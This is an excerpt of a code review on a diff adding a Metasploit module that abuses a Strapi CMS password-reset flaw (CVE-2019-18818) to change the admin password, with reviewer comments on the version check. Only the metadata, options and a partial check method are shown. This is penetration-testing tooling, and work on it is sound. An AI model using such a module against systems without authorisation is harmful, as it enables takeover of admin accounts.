modules/auxiliary/scanner/http/strapi_3_password_reset.rb

```diff
@@ -0,0 +1,125 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Strapi CMS Unauthenticated Password Reset',
+        'Description' => %q{
+          This module abuses the mishandling of a password reset request for
+          Strapi CMS version 3.0.0-beta.17.4 to change the password of the admin user.
+
+          Successfully tested against Strapi CMS version 3.0.0-beta.17.4.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'WackyH4cker', # original module creation
+          'h00die' # lots of fixes, documentation, standardization
+        ],
+        'References' => [
+          [ 'URL', 'https://vulners.com/cve/CVE-2019-18818' ],
+          [ 'URL', 'https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.4' ],
+          [ 'URL', 'https://github.com/strapi/strapi/pull/4443' ],
+          [ 'CVE', '2019-18818' ],
+          [ 'EDB', '50716' ]
+        ],
+        'Privileged' => true,
+        'DisclosureDate' => '2022-02-09',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('NEW_PASSWORD', [true, 'New Admin password']),
+      OptString.new('TARGETURI', [true, 'The base path to strapi', '/'])
+    ]
+  end
+
+  # not used, but figured id include it anyways
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'admin', 'init')
+    })
+    return Exploit::CheckCode::Unknown('Unable to determine due to a HTTP connection timeout') if res.nil?
+
+    begin
+      version = JSON.parse(res.body)
+    rescue JSON::ParserError
+      return Exploit::CheckCode::Safe("Unable to parse json data: #{res.body}")
+    end
+
+    # Untested if it works with versions lower than 3.0.0-beta.17.4.
+    # builds of 3.0.0-beta.17.3 and lower fail:
+    # npm ERR! gyp: Undefined variable standalone_static_library in binding.gyp while trying to load binding.gyp
+    # however vulners shows 3.0.0 and up to 3.0.0-beta.17.4 are vulnerable
+    version = Rex::Version.new(version.dig('data', 'strapiVersion'))
+    if version <= Rex::Version.new('3.0.0-beta.17.4') && version >= Rex::Version.new('3.0.0')
```

Comment:
It looks like `3.0.0` wasn't vulnerable from my testing above - or a different slightly different exploit is needed for RCE

Based on the available versions:
https://www.npmjs.com/package/create-strapi-app?activeTab=versions


Should this maybe be something like:

```
if version.start_with?('3.0.0-beta') && (Rex::Version.new(version.split('-beta.')[1]) <= Rex::Version.new('17.4'))
```

It also doesn't look like there's alpha versions available on npm even though they're on the vulners page - maybe they were pulled? 🤔

Reply:
I think this looks good. Specially since its code that doesn't run anyways 😉